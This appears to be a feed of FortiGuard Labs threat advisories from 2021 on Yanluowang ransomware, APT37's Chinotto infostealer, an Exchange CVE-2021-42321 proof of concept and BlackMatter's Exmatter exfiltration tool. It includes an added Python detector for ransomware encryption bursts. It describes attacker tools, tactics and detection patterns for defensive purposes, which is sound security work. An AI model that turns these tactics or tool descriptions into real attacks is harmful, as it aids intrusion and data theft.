- Cobalt Strike Beacon: A tool that allows the attacker to perform command execution, keylogging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement
- ProxifierPE: A tool to proxy connections back to the attacker's command and control (C&C) server
- ConnectWise: Remote desktop software that gives the attacker remote access
- AdFind: A command-line Active Directory query tool
- SoftPerfect Network Scanner: A tool to discover hostnames and network services
- BazarLoader: A backdoor used to deploy additional malware and steal confidential information from the compromised machine. The attacker typically downloads BazarLoader using PowerShell.
The initial attack vector is unclear, so suspicious emails must be handled with caution and patches for the products and software used in the organization must be applied.

What is Yanluowang Ransomware?
Yanluowang ransomware is reported to perform the following actions:
- Terminates all hypervisor virtual machines (VMs) running on the compromised machine
- Terminates processes listed in processes.txt, such as SQL and the Veeam backup solution
- Encrypts files on the victim's machine and appends the .yanluowang extension to them
- Drops a ransom note
In the ransom note, the Yanluowang attacker asks the victim to follow their rules, including not contacting law enforcement or ransomware negotiation companies; otherwise the attacker threatens to launch distributed denial of service (DDoS) attacks against the victim and to make phone calls to the victim's employees and business partners.

What is the Status of Protection?
FortiGuard Labs provides the following AV coverage against Yanluowang ransomware:
W32/Ylwransom.A!tr.ransom
All network IOCs are blocked by the WebFiltering client. Ransomware Malware Tool Threat ★★
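The behavioural sequence above (backup, database and VM processes terminated, then a burst of files renamed with the .yanluowang extension) is what an endpoint detection would key on. The script below is an added example, not FortiGuard or Symantec code, run over constructed endpoint telemetry: the event tuple layout (timestamp in seconds, host, kind, detail), the process names in PREP_KILL_TARGETS and the ransom-note filename are assumptions for the demo, not fields or indicators taken from the report.

```python
"""Behavioural detection for the Yanluowang sequence (added example).
Event layout (assumed): (timestamp_seconds, host, kind, detail)."""
from collections import defaultdict

RANSOM_EXT = ".yanluowang"
# Processes the report says are killed before encryption; exact names are assumed.
PREP_KILL_TARGETS = {"sqlservr.exe", "veeam.backup.service.exe", "vmware-vmx.exe"}
RENAME_THRESHOLD = 5   # renames to the ransom extension ...
WINDOW_SECONDS = 60    # ... within this interval count as an encryption burst


def rename_burst_start(times):
    """Earliest timestamp at which RENAME_THRESHOLD renames fall inside WINDOW_SECONDS."""
    times = sorted(times)
    for i in range(len(times) - RENAME_THRESHOLD + 1):
        if times[i + RENAME_THRESHOLD - 1] - times[i] <= WINDOW_SECONDS:
            return times[i]
    return None


def detect(events):
    """Return {host: verdict}.  A rename burst alone gives 'encryption'; a kill of a
    backup/database/VM process at or before the burst upgrades it to 'prep+encryption'."""
    by_host = defaultdict(list)
    for event in events:
        by_host[event[1]].append(event)
    verdicts = {}
    for host, host_events in by_host.items():
        renames = [t for t, _, kind, detail in host_events
                   if kind == "file_rename" and detail.lower().endswith(RANSOM_EXT)]
        kills = [t for t, _, kind, detail in host_events
                 if kind == "process_terminate" and detail.lower() in PREP_KILL_TARGETS]
        burst = rename_burst_start(renames)
        if burst is None:
            verdicts[host] = "clean"
        elif any(k <= burst for k in kills):
            verdicts[host] = "prep+encryption"
        else:
            verdicts[host] = "encryption"
    return verdicts


# Constructed telemetry: hostA shows the full sequence, hostB a single stray rename
# (an analyst copying a sample), hostC a rename burst with no preceding kills.
SAMPLE_EVENTS = [
    (100, "hostA", "process_terminate", "sqlservr.exe"),
    (101, "hostA", "process_terminate", "Veeam.Backup.Service.exe"),
    (130, "hostA", "file_rename", r"C:\Finance\Q3.xlsx.yanluowang"),
    (131, "hostA", "file_rename", r"C:\Finance\Q4.xlsx.yanluowang"),
    (132, "hostA", "file_rename", r"C:\Finance\budget.docx.yanluowang"),
    (133, "hostA", "file_rename", r"C:\Finance\notes.txt.yanluowang"),
    (134, "hostA", "file_rename", r"C:\Finance\ledger.pdf.yanluowang"),
    (135, "hostA", "file_create", r"C:\Finance\README.txt"),   # note filename assumed
    (200, "hostB", "file_rename", r"C:\Samples\test.bin.yanluowang"),
] + [(300 + i, "hostC", "file_rename", rf"D:\Share\doc{i}.pdf.yanluowang") for i in range(6)]

if __name__ == "__main__":
    for host, verdict in sorted(detect(SAMPLE_EVENTS).items()):
        print(f"{host}: {verdict}")
```

The extension match on its own is a weak signal (hostB), which is why the rule requires a burst; the preceding process terminations are what separate an encryption run from a noisy but benign host, and in a real deployment the process list would be taken from the sample's processes.txt rather than the assumed names above.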
Fortinet.webp 2021-11-30 11:24:48 Recent APT37 Activity and Chinotto, a Multi Platform Infostealer (direct link) FortiGuard Labs is aware of reports of recent activity from APT37. APT37 is a nation-state threat actor attributed to North Korea. The latest discovery by researchers at Kaspersky Labs has revealed a sophisticated, targeted attack that uses stolen credentials from Facebook and email accounts belonging to an associate of the targeted victim. The victim was socially engineered into opening RAR archive attachments purporting to come from the trusted sender; the archive contained a malicious Word document. The Word document is multi-stage in design and uses a malicious macro to initiate the first stage. The first stage checks for the presence of AV software and, if AV is not present, initiates the second stage, a shellcode that downloads the final third-stage payload. Ultimately, after several months of dwelling undetected on the infected system, the backdoor downloads the multi-platform infostealer "Chinotto". Windows variants were sent via spearphishing emails and Android variants via smishing (SMS phishing) texts.

What Operating Systems are Affected?
Chinotto targets Windows and Android operating systems.

Is This Limited to Targeted Attacks?
Yes.

How Serious of an Issue is This?
Medium.

What is APT37?
APT37 (also known as GROUP123 and ScarCruft), attributed to North Korean threat actors, has been in operation for several years. During that time, APT37 has been attributed with the Adobe Flash zero-day attack (CVE-2018-4878) that targeted researchers based in South Korea who were performing research on North Korea. APT37 focuses on various organizations with an interest in North Korea. APT37 is well known for exploiting vulnerabilities in the Hangul Word Processor (HWP), which is commonly used in South Korea, especially in the government sector. Analysis suggests that this is a very detailed and sophisticated threat actor with an arsenal of malware and exploits at its disposal, targeting various verticals and organizations with specially crafted campaigns. Besides the Adobe and Hangul vulnerabilities, the group has also been observed using Microsoft vulnerabilities, specifically CVE-2017-0199 (Microsoft Office/WordPad remote code execution via malicious OLE objects) and CVE-2015-2545 (Microsoft Office Encapsulated PostScript (EPS) vulnerability). For further details on the exploitation of HWP documents and the campaigns previously analyzed, please refer to our earlier blog post.

What is the Status of Coverage?
FortiGuard Labs has AV coverage in place for publicly available samples as:
VBA/Agent.AAK!tr
W32/PossibleThreat
VBA/Agent.AF3C!tr
W32/Agent.ACDD!tr
PossibleThreat.MU
PossibleThreat.PALLAS.H
W32/FRS.VSNTGF20!tr
W32/Bsymem.MSJ!tr
All network IOCs are blocked by the WebFiltering client.

Any Other Suggested Mitigation?
Due to the ease of disruption and the potential for damage to daily operations, reputation, and unwanted release of personally identifiable information (PII), it is important to keep all AV and IPS signatures up to date. It is also important to ensure that all known vendor vulnerabilities are addressed and updated to deny attackers a foothold within the network. Attackers are well aware of the difficulty of patching; if patching is determined not to be feasible at this time, an assessment should be conducted to determine risk. Also, as this campaign was delivered via spearphishing and smishing, organizations are encouraged to conduct ongoing training sessions to educate and inform personnel about the latest phishing, spearphishing and smishing attacks. Employees should be encouraged never to open attachments from someone they don't know, and always to treat emails from unrecognized or untrusted senders with caution. Since it has been reported that various phishing, spearphishing and smishing attacks have been delivered via social engineering, it is crucial that end users within an organization be made aware of the various types of attacks being delivered. This can be accomplished through regular training sessions and impromptu tests using predetermined templates run by an organization's internal security department. Malware Threat Patching Cloud APT 37
Fortinet.webp 2021-11-23 17:18:27 New Proof of Concept for CVE-2021-42321 Released (Microsoft Exchange Remote Code Execution Vulnerability) (direct link) FortiGuard Labs is aware of a new proof of concept that leverages CVE-2021-42321, a Microsoft Exchange Server remote code execution vulnerability. The proof of concept, released by security researcher @jannggg on Twitter, exercises a post-authentication remote code execution vulnerability. Patches for CVE-2021-42321 were released by Microsoft on November 9th, and the vulnerability is rated IMPORTANT.

What is the CVSS Score?
This vulnerability has a CVSS base score of 8.8.

Does the Attacker Need to be Authenticated?
Yes. The attacker needs to be authenticated to the Microsoft Exchange Server.

What Versions of Software are Affected?
Microsoft has released security updates for the following versions of Microsoft Exchange:
Exchange Server 2013
Exchange Server 2016
Exchange Server 2019

Is this Being Exploited In the Wild?
Yes. Microsoft states that exploitation is limited to targeted attacks.

Has the Vendor Issued a Patch?
Yes, Microsoft issued a patch on November 9th. For further information on the vulnerability, including a link to the available patches, please refer to the "Released: November 2021 Exchange Server Security Updates" link in the APPENDIX.

Any Suggested Mitigation?
As there have been reports of exploitation in the wild, and proof of concept code is now available, it is imperative that patches are applied to affected systems as soon as possible. To determine which machines may be behind on updates with respect to this latest patch, Microsoft has made available a PowerShell script that helps inventory potentially vulnerable machines on the network. Please refer to "Exchange Server Health Checker" in the APPENDIX for this script.

What is the Status of Coverage?
Coverage is being investigated at this time for feasibility. This Threat Signal will be updated once further information is available. Vulnerability Threat
Fortinet.webp 2021-11-16 13:16:47 BlackMatter Uses New Custom Data Exfiltration Tool (direct link) FortiGuard Labs is aware that a BlackMatter ransomware affiliate has started to use a new custom data exfiltration tool called "Exmatter". The tool is used to steal specific file types from predetermined directories and upload them to an attacker-controlled server. This happens before the ransomware is deployed to the victim's network.

Why is this Significant?
This is significant because Exmatter targets specific file types that the attacker considers valuable, so that they can be stolen as quickly as possible. That allows the attacker to spend less time on the network before deploying the BlackMatter ransomware.

What File Types is Exmatter Designed to Steal?
According to security vendor Symantec, files with the following extensions on the compromised machine are targeted by Exmatter: .doc, .docx, .xls, .xlsx, .pdf, .msg, .png, .ppt, .pptx, .sda, .sdm, .sdw, .csv, .xlsm, .zip, .json, .config, .ts, .cs, .js, .asp, .pst

Are There Multiple Versions of Exmatter?
According to the security vendor, at least four versions of Exmatter were used by a BlackMatter affiliate. Newer versions add file extensions to steal, as well as specific strings in file names that Exmatter excludes from the exfiltration targets. One directory target was shortened so that Exmatter can search more files for exfiltration. The SFTP server details used for uploading the stolen data were also updated, and WebDAV was added as a fallback in case the SFTP transfer fails.

What is the Significance of the Updates Made to Exmatter?
It is significant because the attacker used lessons learned on previous victims' networks to update Exmatter and make data exfiltration more efficient and effective against future victims.

What does FortiGuard Labs Know About BlackMatter Ransomware?
BlackMatter ransomware is a fairly new Ransomware-as-a-Service (RaaS) operation discovered in late July 2021. The group posted ads on hacking forums recruiting affiliates and offering to buy access to compromised corporate networks in order to deploy ransomware. FortiGuard Labs has previously released two Threat Signals on BlackMatter ransomware. See the Appendix for links to the Threat Signals "Meet BlackMatter: Yet Another RaaS in the Wild" and "Joint CyberSecurity Advisory on BlackMatter Ransomware (AA21-291A)".

What is the Status of Coverage?
FortiGuard Labs provides the following AV coverage against Exmatter:
MSIL/Agent.7AAD!tr
W32/Crypt!tr
PossibleThreat
All network IOCs related to this threat are blocked by the FortiGuard WebFiltering client. Ransomware Tool Threat
Last update at: 2024-07-05 21:07:41